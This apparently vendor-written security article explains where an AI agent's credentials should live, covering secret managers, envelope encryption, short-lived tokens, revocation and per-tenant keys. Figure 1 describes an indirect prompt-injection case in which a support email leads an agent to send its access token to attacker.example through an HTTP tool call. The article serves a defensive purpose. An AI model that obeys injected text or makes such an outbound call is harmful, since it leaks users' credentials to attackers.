
Security patterns
Where Should an AI Agent's Credentials Live?
A secret manager protects a credential from your disk, not from your model. Storage options, envelope encryption, short-lived tokens and what revocation actually does, checked against vendor docs.
TL;DR
A credential should live in a vault the agent cannot read, and reach the provider inside a request the agent
never sees. The failure mode isn't a leaked .env file. It's a valid token that sat in a model's context
window and left in a tool call.
That distinction is the whole argument. An agent's context is filled with content an attacker can reach: retrieved documents, tool output, a ticket someone emailed in. OWASP's own position on prompt injection is that "it is unclear if there are fool-proof methods of prevention."
So the usual advice stops one step short. Moving a key from a config file into AWS Secrets Manager changes who can read it off a disk. It does nothing about who can read it out of a prompt, because your agent is authorized to fetch it and will happily do so on request.
We're not claiming secret managers are theatre. Envelope encryption, key policies and audited access are real, and you want all of them. They just solve a different problem than the one agents introduce.
The three moves that do help: attach credentials server-side at call time so the agent holds a reference, prefer a 15-minute token over a stored refresh token, and hold one credential per user rather than one shared key for everybody.
Overview
Take an IT helpdesk agent at a 900-person company. It reads each employee's mailbox and calendar through Microsoft Graph, files tickets, resets things it's allowed to reset. To do that it needs a credential for Graph, a credential for the ticketing system, and because it acts for named people, it needs a different Graph credential for each of the 900 employees.
Ask the team where those credentials live and you'll usually get an infrastructure answer. Secrets Manager. Key Vault. Vault, with a Kubernetes auth method. All reasonable, all beside the point, because the question that decides whether this agent is safe is not where the bytes are encrypted. It's whether the plaintext ever enters the model's context, and what the agent can do with it once it's there.
Storage mechanics for OAuth tokens are covered separately in how to store OAuth tokens securely, refresh mechanics in token refresh 101, and the three runtime controls in permissioning, audit and revocation. This is the layer underneath those: the storage substrate itself, named services and their actual documented behaviour, and the specific way that behaviour changes when the thing holding the credential is a language model.
The rule we'd start from: a credential the agent can read is a credential the agent can leak. Treat the context window as an output channel, not a workspace.
The Threat That Makes This Different
Ordinary secret storage assumes a well-behaved process. The code that fetches the secret is code you wrote, it uses the secret for the call it was fetched for, and it doesn't narrate its memory contents to strangers. None of that holds for an agent.
An agent's context window is assembled at runtime out of whatever it retrieved. OWASP's LLM01 entry describes the mechanism plainly: "Indirect prompt injections occur when an LLM accepts input from external sources, such as websites or files. The content may have...data that when interpreted by the model, alters the behavior of the model in unintended or unexpected ways." For the helpdesk agent, the external source is an inbox. Anyone with the support address can put text in front of the model.
Now put a Graph token in the same context, and the agent has both the secret and a way to send it. It doesn't need a vulnerability. It needs a plausible instruction and any tool that makes an outbound request.
Agent Agent context already holds the access token Agent --GET attacker.example/?d=<token>--> HTTP tool --> attacker host Agent then files an ordinary ticket. No error, no alert. -->
Figure 1 — Indirect prompt injection as a credential-exfiltration path. The delivery is a support email and the exit is an ordinary tool call, so nothing in the run looks like a failure.
Injection is the delivery mechanism, and it isn't a solved problem. OWASP says so directly: "Given the stochastic influence at the heart of the way models work, it is unclear if there are fool-proof methods of prevention for prompt injection", and notes that retrieval and fine-tuning "do not fully mitigate prompt injection vulnerabilities." Build on the assumption that some fraction of injections land.
Which is why the protocol people landed on the same conclusion from a different direction. MCP's security guidance forbids passing credentials through a server that hasn't validated them: "MCP servers MUST NOT accept any tokens that were not explicitly issued for the MCP server." Its stated reason is worth keeping: "If the MCP Server passes tokens without validating their claims (e.g., roles, privileges, or audience) or other metadata, a malicious actor in possession of a stolen token can use the server as a proxy for data exfiltration."
There's a quieter version of the same problem. Even with no attacker, a secret in the context gets copied wherever the context goes: your tracing backend, your prompt logs, your eval fixtures, the model provider's request path. A token in a prompt is a token in five systems you didn't threat-model.
Where a Credential Can Actually Live
Five patterns cover nearly everything teams do, and they differ mainly in one column: can the agent read the plaintext?
| Pattern | Who can read the plaintext | Rotation story | Use it when |
|---|---|---|---|
Environment variables and .env | Every line of code in the process, including any shell or file tool the model can call | Redeploy | Local development, and honestly not much else |
| Cloud secret manager (AWS Secrets Manager, Google Secret Manager, Azure Key Vault) | Any code holding the fetch permission, so still the agent process | Managed or scheduled; varies sharply by vendor | Service-level credentials with a stable owner |
| HashiCorp Vault dynamic secrets | The agent, but only for the lease duration | Built in: credentials are minted per request and die with the lease | Databases and cloud accounts that support dynamic backends |
| Broker that injects at call time | Nobody in the agent process; the agent holds a reference | Owned by the broker, invisible to the agent | Any agent exposed to untrusted content |
| Per-user credentials behind a broker | Nobody in the agent process; scoped to one person | Per-connection refresh | Agents acting on behalf of many named people |
Table 1 — Storage patterns for agent credentials, ordered roughly by how much the agent gets to see. The rotation column is where vendor behaviour differs most, and the differences are documented below.
Environment variables deserve one paragraph and no more. The process boundary is the security boundary, and an
agent with a shell tool, a file-read tool or a Python sandbox has crossed it by design. If you hand an agent
the ability to run code, printenv is a tool call.
Cloud secret managers are a genuine improvement and a common misreading. They move the trust anchor from your filesystem to a KMS key with an auditable policy, which is worth real money. But the fetch permission still belongs to the agent's process, so the plaintext still lands somewhere the model might be induced to read. The bootstrap problem is also stubborn, and Microsoft's own Key Vault documentation is unusually candid about it: it recommends managed identities because "the app or service isn't managing the rotation of the first secret", and says of the alternative that "it's hard to automatically rotate the bootstrap secret that's used to authenticate to Key Vault." If your platform offers a workload identity, take it. That's one fewer long-lived string in your system.
Vault's dynamic secrets are the strongest version of the storage idea, because they make the credential
short-lived by construction. Every dynamic secret comes with a lease, which Vault defines as "metadata
containing information such as a time duration, renewability, and more", and the promise attached to it is
that "Vault promises that the data will be valid for the given duration, or Time To Live (TTL)." Expiry does
the cleanup: "When a lease is expired, Vault will automatically revoke that lease." Lease IDs are also
path-prefixed, so vault lease revoke -prefix aws/ kills a whole tree at once. For a database or a cloud
account, that beats anything you'll build.
A broker is the pattern that actually answers Figure 1. The agent calls a tool by name with arguments. The broker resolves which credential that call needs, attaches it server-side, makes the request, and returns the result. The agent ends up holding a session, not a secret, and the exfiltration path in Figure 1 has nothing to carry.
Figure 2 — The same call, two trust models. The only structural difference is whether the plaintext crosses into the model's context, and that difference is what decides the blast radius of an injection.
Per-user credentials are the last row and the one most enterprise agents need. One shared service account for 900 employees means the agent's reach is the union of everyone's access, forever, and your audit trail says "the agent did it" rather than naming the person it acted for.
Encryption at Rest, in the Terms the Services Use
Every managed secret store does the same thing under different names, and it's worth knowing the names because the configuration knobs hang off them.
Envelope encryption means the secret is encrypted with a data key, and the data key is encrypted with a key that lives somewhere better. AWS documents the sequence exactly: Secrets Manager "uses the KMS key to generate and encrypt a 256-bit Advanced Encryption Standard (AES) symmetric data key, and uses the data key to encrypt the secret value", then "uses the plaintext data key to encrypt the secret value outside of AWS KMS, and then removes it from memory." The encrypted data key is stored in the secret's metadata. Google Secret Manager describes the same two layers, a per-object DEK wrapped by "a key encryption key (KEK) that is owned by the Secret Manager service", with customer-managed keys swapping that KEK for one you hold in Cloud KMS. Azure splits the choice at the container: vaults "support storing software and HSM-backed keys, secrets, and certificates" while "Managed HSM pools only support HSM-backed keys", validated to FIPS 140-3 Level 3.
Two AWS details matter more for agents than they do for ordinary workloads. Secrets Manager encrypts the
secret value but explicitly not the secret name, description, rotation settings or tags, so don't put anything
sensitive in a secret's name. And every encrypt and decrypt carries an encryption context naming the secret
ARN and version, which you can use as a condition in an IAM or key policy. Combined with the kms:ViaService
condition key pinned to secretsmanager.<region>.amazonaws.com, that gives you a second gate that a stolen
role has to pass.
Rotation is where the three clouds stop agreeing, and the gap catches people. AWS runs it for you: managed
rotation for supported services, or a Lambda rotation function for everything else, promoting versions through
the AWSCURRENT, AWSPENDING and AWSPREVIOUS staging labels. Google Secret Manager does not rotate
anything. It notifies. Secret Manager "triggers a SECRET_ROTATE message to the designated Pub/Sub topics"
at the secret's next_rotation_time, and "You must configure a Pub/Sub subscriber to receive and act on the
SECRET_ROTATE messages." The rotation_period "can't be less than one hour long". If you read "rotation" on
that product page and assumed the credential changes by itself, it doesn't, and the secret quietly ages.
Encryption at rest defends against the disk, the backup and the database administrator. It does not defend against a caller with the fetch permission, and your agent is exactly that caller. Those are different threats and they need different controls.
There's a rotation trap specific to per-user OAuth storage. Providers that rotate refresh tokens hand you a
new one on every refresh, which means a write per user per refresh cycle. AWS advises you "avoid calling
PutSecretValue or UpdateSecret at a sustained rate of more than once every 10 minutes", caps versions at
100 per secret, and "removes unlabeled versions when there are more than 100, but it does not remove versions
created less than 24 hours ago." A secret manager is built for secrets that change monthly. A rotating
per-user refresh token is closer to a row in a database, and that is usually where it should live, encrypted
under a KMS key rather than stored as a managed secret.
Short-Lived Tokens, and What Federation Replaces
A 15-minute token and a stored refresh token are not the same object with different numbers on them. One is a bounded liability. The other is a standing grant that an attacker can keep using until somebody notices.
The numbers are worth being precise about. AWS STS AssumeRole accepts a DurationSeconds "from 900 seconds
(15 minutes) up to the maximum session duration set for the role", default 3600, ceiling 43200, and role
chaining is "limited to a maximum of one hour" regardless. Session policies passed at assume time give you
narrowing for free: "the resulting session's permissions are the intersection of the role's identity-based
policy and the session policies", and you cannot widen past the role. For an agent doing one job, that's a
per-task credential with a per-task scope.
Microsoft's defaults are the counter-example. An Entra access token's "default lifetime is assigned a random value ranging between 60-90 minutes (75 minutes on average)", configurable from 10 minutes to 23:59:59. But refresh and session token lifetimes "are no longer configurable through token lifetime policies", and the documented default for both single-factor and multi-factor refresh token max age is Until-revoked, with a 90-day max inactive time. Store one of those and you're holding something with no expiry date. Continuous Access Evaluation changes the shape rather than the size: capable clients may get tokens extended to 24-28 hours, which are then "revoked in near real time in response to critical events such as account disablement and password changes."
Google's expiry rules are different again, and two of them bite in test environments. A refresh token stops working if "the refresh token has not been used for six months", and a project whose consent screen is in "Testing" gets a refresh token "expiring in 7 days". There is also "a limit of 100 refresh tokens per Google Account per OAuth 2.0 client ID", which an agent platform minting a fresh grant per session will hit.
Workload identity federation is the piece that removes the bottom credential entirely. Google's framing of the problem it solves is blunt: applications outside Google Cloud "can use service account keys to access Google Cloud resources. However, service account keys are powerful credentials, and can present a security risk if they are not managed correctly." The replacement is an exchange rather than a stored key: "You provide a credential from your IdP to the Security Token Service, which verifies the identity on the credential, and then returns a federated token in exchange", which you then trade for a short-lived OAuth 2.0 access token. Same idea as an Azure managed identity, same idea as an IAM role on a pod. What it replaces is not your user credentials. It replaces the key your infrastructure used to authenticate itself, which is the one credential that was hardest to rotate and easiest to forget.
Revocation: Deleting Your Copy Is Not Revocation
This is the part teams get wrong most consistently, and it's a one-line distinction. Deleting your stored copy of a token removes your ability to use it. It does nothing to the grant at the provider. If that value was ever copied, logged, traced or exfiltrated, it still works.
Actual revocation is a call. RFC 7009 defines the endpoint and its semantics: "A revocation request will invalidate the actual token and, if applicable, other tokens based on the same authorization grant", and when you revoke a refresh token "the authorization server SHOULD also invalidate all access tokens based on the same authorization grant." Note the strength of the verbs. Servers "MUST support the revocation of refresh tokens and SHOULD support the revocation of access tokens", so a compliant provider is allowed to leave already-issued access tokens alive until they expire.
Figure 3 — What a Disconnect button does and does not do. The two branches differ by one outbound HTTP call, and the residual window on the right is the access token lifetime.
What each provider offers varies more than you'd hope. Google publishes a revocation endpoint at
https://oauth2.googleapis.com/revoke and takes the token as a parameter. Slack's auth.revoke "revokes an
access token", with a test parameter where "Setting this parameter to 1 triggers a testing mode where the
specified token will not actually be revoked", and a side effect worth reading before you wire it up: revoking
a bot token "will not uninstall the bot user or the app. It will, however, deactivate the bot user and remove
its channel memberships." Microsoft takes a different route. Graph's revokeSignInSessions "invalidates all
the refresh tokens issued to applications for a user (and session cookies in a user's browser), by resetting
the signInSessionsValidFromDateTime user property to the current date-time", with two caveats in the docs:
"there might be a small delay of a few minutes before tokens are revoked", and it "doesn't revoke sign-in
sessions for external users, because external users sign in through their home tenant."
So a Disconnect button honestly implemented does three things: deletes your copy, calls the provider's revocation endpoint if one exists, and drops any cached access token immediately rather than letting it run to expiry. The third is the one that gets skipped, and it's the one that determines how long after the click the agent can still act.
Multi-Tenant Storage and the Blast Radius Question
If you're holding credentials for other companies' users, there's one question that matters more than the rest. If a single credential record leaks, how many customers have to call their provider?
Most platforms answer that with a tenant column and a query filter. That is application-level isolation, and it
works exactly as well as your least careful query. The stronger version puts the boundary in the crypto: a
separate KEK per tenant, so ciphertext for tenant A is inert to anything holding only tenant B's key. On AWS
that's a customer managed key per tenant, with the encryption context and kms:ViaService conditions doing
enforcement at the key rather than in your code. It also gives you a clean delete. Destroy the key and every
credential encrypted under it is unrecoverable, which is a much better story for a departing customer than a
row deletion you have to prove.
Vault's answer is namespaces, which "support secure multi-tenancy (SMT) within a single Vault Enterprise instance with tenant isolation and administration delegation", each namespace functioning as "a mini-Vault instance within your Vault installation." Note the licensing: namespaces require an "appropriate Vault Enterprise license or HCP Vault Dedicated cluster". If you're running community Vault and planning on namespaces for tenant separation, that's a budget line, not a config flag.
The per-user quota question comes up here too, and the numbers are less scary than people assume. Secrets
Manager allows 500,000 secrets per account per Region, 65,536 bytes per value, 100 versions per secret, and
GetSecretValue at 10,000 requests per second. A credential per user is feasible. It's the write rate from
rotating refresh tokens, not the count, that pushes you toward a database with a KMS-wrapped column.
Write the blast radius down as a number. One shared service account: every user of that provider. One credential per user, one key per tenant: one person. Any design where you can't state the number is a design where nobody has checked.
A Checklist to Run Against Your Own System
Eight questions. Any "no" is a finding.
- Can you point at the line of code where the plaintext credential is attached to the outbound request, and is it outside the agent's process?
- Can the agent, through any tool it has (shell, file read, HTTP, code execution), obtain that plaintext?
- Grep your traces and prompt logs for a known token prefix. Zero hits, or you have a second incident.
- Is the credential short-lived, and if it isn't, what's the documented maximum age? "Until-revoked" is an answer, and not a good one.
- Does your Disconnect path call the provider's revocation endpoint, and does it drop cached access tokens instead of waiting for expiry?
- For each provider you integrate, do you know whether it offers revocation at all, and what it leaves alive?
- Is there one credential per acting user, or one shared account standing in for all of them?
- If one credential record leaked, how many tenants are affected? State the number.
Where Fabriq Fits
Agentic Fabriq's default is Figure 2's right-hand side. Credentials are per user, held in a vault, and attached server-side at the moment of the call, so the agent holds a session rather than a secret and there is no plaintext in its context to exfiltrate. An opt-in token-broker mode hands back the raw credential for the cases that genuinely need it, which is a deliberate trade and should be treated as one. Every request carries two identities, the agent's and the acting user's, and each call lands in an audit record, so the question "who was this done for" has an answer that isn't "the agent".
What it does not do is reach into the provider on your behalf when a user disconnects. Clearing a vault copy is
not the same act as invalidating a grant upstream, and the call to https://oauth2.googleapis.com/revoke or
auth.revoke is still yours to make.
Frequently Asked Questions
Where should I store API keys for an AI agent? Somewhere the agent's process cannot read them: a broker or gateway that holds the credential and attaches it to outbound calls, backed by a managed secret store or a KMS-encrypted database column. Storing them in a secret manager the agent can query is better than a config file and still leaves the plaintext reachable from the model's context.
Are environment variables safe for agent credentials? No, if the agent can run code, read files or shell out. The process is the boundary, and those tools cross it. Environment variables are fine for local development and for the bootstrap identity of a service that has no better option.
Can an AI agent leak its own API key? Yes, and it doesn't take a bug. If the credential is in the context window and the agent has any tool that makes an outbound request, an injected instruction in retrieved content can carry it out. OWASP's position is that there is no known fool-proof prevention for prompt injection, so design as though some attempts succeed.
AWS Secrets Manager or HashiCorp Vault for agent credentials? If the credential is for a database or a cloud account with a dynamic backend, Vault's dynamic secrets are stronger, because the credential is minted per request and auto-revoked when its lease expires. For static third-party API keys on AWS, Secrets Manager with a customer managed KMS key and managed rotation is simpler and less to run. Neither keeps the plaintext out of your agent by itself.
Do I need a separate credential for each user? If the agent acts on behalf of named people, yes. Otherwise the agent's reach is the union of everyone's access and your audit trail can't attribute anything. Quotas are rarely the blocker: Secrets Manager permits 500,000 secrets per Region.
How do I revoke an agent's access to a user's Google account? POST the token to
https://oauth2.googleapis.com/revoke. Under RFC 7009 revoking a refresh token should invalidate access tokens
from the same grant, but access token revocation is only a SHOULD, so also drop any copy you cached.
Is deleting the token from my database enough? No. That removes your ability to use it and leaves the grant live at the provider. Anyone holding a copy from a log, a trace or an exfiltration still has working access.
What does workload identity federation actually replace? The long-lived key your infrastructure used to authenticate itself, such as a Google service account key. You exchange an IdP credential at a security token service for a short-lived token instead of storing a key. It does not replace the per-user credentials your agent needs for third-party SaaS.
Is a 15-minute token really better if the agent can just mint another one? Yes, because the two are different assets. Minting requires the agent's own identity and gets logged; a stolen 15-minute token gets you 15 minutes and a stolen refresh token gets you months. Compare that against Entra's documented refresh token max age, which is "Until-revoked".
Conclusion
The storage question and the exposure question are separate, and most of the available advice answers only the first. Pick your envelope encryption, pin your KMS key policies, use managed rotation where the vendor actually rotates something and build the Pub/Sub subscriber where it doesn't. All of that is table stakes and none of it addresses an agent reading its own token out of a prompt and mailing it to an address in a support ticket.
What changes the outcome is keeping the plaintext on the other side of a boundary the model can't reach, shortening every lifetime you control, and treating revocation as an outbound call rather than a delete statement. For the helpdesk agent, that means 900 per-user credentials nobody in the agent process can read, each one narrow enough that its loss is one person's problem.
The test we'd apply: print the exact bytes an attacker would get from a successful injection. If that list includes anything a provider would accept, the credential is in the wrong place, and no amount of encryption at rest moves it.
Sources
All URLs read 2026-09-29.
- Secret encryption and decryption in AWS Secrets Manager — envelope encryption, 256-bit AES data keys, encryption context, what is not encrypted.
- Rotate AWS Secrets Manager secrets — managed rotation versus Lambda rotation functions.
- AWS Secrets Manager quotas — 500,000 secrets per Region, 65,536-byte values, 100 versions, write-rate guidance.
- AWS STS AssumeRole API reference — 900-second minimum, 3600 default, 43200 maximum, role chaining cap, session policy intersection.
- Customer-managed encryption keys, Google Secret Manager — default encryption, DEK wrapped by a service-owned KEK.
- Create rotation schedules, Google Secret Manager —
SECRET_ROTATEPub/Sub notifications and the one-hour minimum rotation period. - Workload identity federation, Google Cloud IAM — what service account keys are replaced with, and the STS exchange.
- What is Azure Key Vault? — vaults versus Managed HSM, FIPS 140-3 Level 3, managed identities and the bootstrap-secret problem.
- Configurable token lifetimes, Microsoft identity platform — 60-90 minute access tokens, Until-revoked refresh tokens, CAE extension to 24-28 hours.
- user: revokeSignInSessions, Microsoft Graph — what it invalidates, the few-minute delay, external-user limitation.
- Lease, Renew, and Revoke, HashiCorp Vault — leases, TTLs, automatic revocation, prefix revocation.
- Vault Enterprise namespaces — secure multi-tenancy and the Enterprise licensing requirement.
- RFC 7009: OAuth 2.0 Token Revocation — MUST for refresh tokens, SHOULD for access tokens, grant-wide invalidation.
- Using OAuth 2.0 to Access Google APIs — six-month inactivity expiry, seven-day Testing refresh tokens, 100-token limit.
- Using OAuth 2.0 for Web Server Applications, Google — the
https://oauth2.googleapis.com/revokeendpoint. - Slack
auth.revokemethod reference — what it revokes, thetestparameter, bot-user side effects. - OWASP LLM01: Prompt Injection — indirect injection via external sources, and the absence of fool-proof prevention.
- MCP Security Best Practices, specification 2026-07-28 — the token passthrough prohibition and the proxy-exfiltration risk.
- OWASP Top 10 for Agentic Applications 2026 — ASI03 Identity and Privilege Abuse.